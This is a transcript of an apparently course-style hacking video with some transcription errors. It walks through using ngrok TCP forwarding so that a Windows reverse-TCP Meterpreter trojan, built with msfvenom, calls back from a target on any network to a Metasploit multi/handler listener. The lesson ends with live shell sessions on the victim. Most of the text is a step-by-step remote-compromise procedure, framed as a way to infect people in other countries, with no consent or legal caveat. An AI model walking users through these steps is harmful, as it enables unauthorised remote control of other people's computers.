Hello and welcome back. All of this time, we only infected devices that were on our local network. But what if there is a person or a target in a different country that we want to infect with our payload? How can we do that? Well, we're going to see right now. As I already mentioned at the end of the previous video, there are two different ways. There is a way of port forwarding on a router, and I'm not going to show that right now because that would require you to have the access to the router, and every router is different, so the settings for the port forwarding could actually be completely different for you and me. But this method, which is a method using a tool called ngrok, works on any network. You do not have to have the access to your router. You can just run this tool and you can hack a device on a completely different network in a completely different country. Let's see how we can do that. So the first thing that I want you to do is I want you to open your Google Chrome and type ngrok in your search bar. Once you do that, you should see this link ngrok.com. Click on it and it will ask you to create an online account. And this is something that you must do in order for this to work. So just go on sign up, create the account, and once you create the account, it will lead you to this page right here where you will have the option to download the ngrok tool. And you will also have 3 different steps as to how you can install and run the tool. So the first step is to download the ngrok and unzip it. We want to download it for Linux as we are running Cal Linux, so I'm just going to go and save the file. Now all of these steps I already did. Once you navigate to the downloads, you will have the ngrok stable.zip file. And you will notice I have 2 of them because, as I mentioned, this is something that I already did. The next thing that you want to do is you want to move this file to your desktop and you want to run this command right here. Once you run that, you want to connect it to your account by running the command under the step number 2, and that is the entire installation. After that, you will be good to go. So let's go back to our terminal and see how ngrok works. You have this file which you downloaded, you unzipped it, and you got this file. This is the ngrok executable. In order to run this, we can type /ngrok, and after it we want to specify what port we want to port forward to their servers. They work similarly as port forwarding to the router, just this time we're using their servers in order to perform the port forwarding. However, with the free version of ngrok, the port might change every time you restart the tool. If you get the paid version of ngrok, then I believe you can get a port forwarded which will be the same every time. But we're going to go with the free version right now, so we can just type dot and then /ngrok, and we want to type TCP, which stands for the connection. We want to initiate a TCP connection, and let's forward the port 5555. This is the command that we want to run in order to run ngrok. Once you do that, press enter. And it will start the tool. If it says session status online, that means everything is working. Under the account, you will see your username, which you created once creating the online account. We can see the version of ngrok, we can see the region to where it port forwarded us, and here is their server that they are using to port forward our port. This is the website or the link, and this is the port that we want our target to connect to. I know this might look confusing, but just stick with me for a moment right now. So we got our ngrok tool ready. Now let's create our payload. I will zoom this in. And I'm going to navigate to the desktop. Great. There are 2 things that differentiate once creating a payload for the local area network and once creating a payload for a different network with the ngrok tool. And those 2 things are localhost and local port that the target connects to. But before we even do that, what I want you to do is I want you to copy this link right here from the slashes up to the 2 dots, so 2.tcp.ngrok.io. For you this might be a different link, but I want you to copy only this part. Copy selection, and I want you to run the command host and then paste this link. This host tool will give us the IP address of this link. So it tells us this link has address 3.138.45. lesson115. And this is the IP address that you will use as a local host for your payload creation. So let's go and type msf1-p, and for this video we don't really need to attack an Android device, we're going to attack Windows. It doesn't really matter, it will work on both of those devices. So I'm just going to go with Windows x64 interpreter reverse TCP, and I'm using x64 because I'm attacking a 64-bit Windows. You can adapt your payload to the machine that you're attacking, and after it we set the L host to be this IP address. Paste the selection, and the L port, remember I also said that the L port is different in this command. The L port is going to be this port right here. So 16722. For you, once again, this port will probably be different. I'm going to copy it and I'm going to paste it right here. And the output can be shell.exe. I'll press enter. And in just a few seconds, we have our payload ready. Now, I'm just going to go and lower both of these terminals, and I'm going to paste it, or paste the payload onto my Windows 10 desktop. Here it is. But before I run it, of course, I have to set up my MSF console listener. So I'm just going to go and enter MSF console. But you will notice that as the local host and local port inside the MSF console, we're not going to be using these two things, this IP address from this link and this port right here. We only use them for our payload creation. In the MSF console, we want to specify this. We want to specify the local host to be the host that we are listening for the incoming connections, and port 5555 to be the local port that is also listening for the incoming connections. So let's go right here. First of all, we're going to use exploit multi-handler. Set the payload to the payload that you generated. In case you're testing this on an Android device, make sure you select the correct payload. And the L host is going to be the IP address of 0.0.0.0, which means we're listening on any interface whatsoever. You should also select and type right here 0.0.0.0, and under the L port, you want to type the port that you forwarded. In my case, it is 5555, so I'm going to type set L port 5555. Once you do this, you want to type run. It will start listening for the connections on 0.0.0.0 on the port that you forwarded. And if I go right here and run this, for some reason it says this app cannot run on Windows. Let's see what the problem is. It could be that x64 is presenting a problem for some reason, so we're just going to create another payload real quick. It might misconfigure something once I pasted it from the Cal Linux to the desktop, but nonetheless, let's remove the current shell.exe and let's run the previous command real fast. First thing is I need an IP address from this link right here, so I'm just going to copy it once again, and I'm going to type host and then paste this. Okay, once we get the IP address, then we want to create the payload, so msf1-p, and let's just use the regular interpreter payload, which I don't believe this was an issue, but just in case, let's go with the regular payload. Lhost is going to be equal to this IP address. Lport is going to be equal to 167.722, which, remember, it is this port number right here. And let's also add -f to be an exe, just so we can specify that this is an exe file. For some reason, maybe this presented us a problem once we copied it to the desktop. And the output is going to be test.exe. And let's just wait for this to finish. Okay, now it gives a different size. It could be that it was a problem because I didn't specify -f exe. Nonetheless, let's go and copy the payload onto the desktop. Let's go and open the MSF console and let's run the Trojan. Go back to Cal Linux and here it is. we got the interpreter session1 opened from the local host on the target machine. But it does tell us right here that interpreter session1 died, and that is because we actually misconfigured the payload right here, since we set it up for the previous payload that didn't work. Therefore, it has this x64. Just so we can make sure everything works, I'm going to set the payload to be Windows interpreter reverse TCP. Show options. Everything else is already set. Let's run the listener once again, and let's run the payload once again. And right now, everything works. We got the interpreter session2 opened, and we can run all of the commands that our interpreter gives us. Awesome. Now this attack will work on any device in the world, because they're not really connecting straight to our machine. They're connecting to this link right here and to this port. And what ngrok is doing for us is it is forwarding their connection back to our machine on the local host and on this port. That's why in the MSF console we're listening on this port and on the local host, while in the payload creation we specified that the target should connect right here. Then they forward the connection and we get our interpreter session opened. And from there, we can execute all of the commands as usual. Awesome. Now, let me know if you also want me to show you the port forwarding, how it looks on my router, in case you want to see that. But nonetheless, this is the best way that you can actually perform port forwarding without needing an access to the router. Thank you for watching, and I will see you in the next video.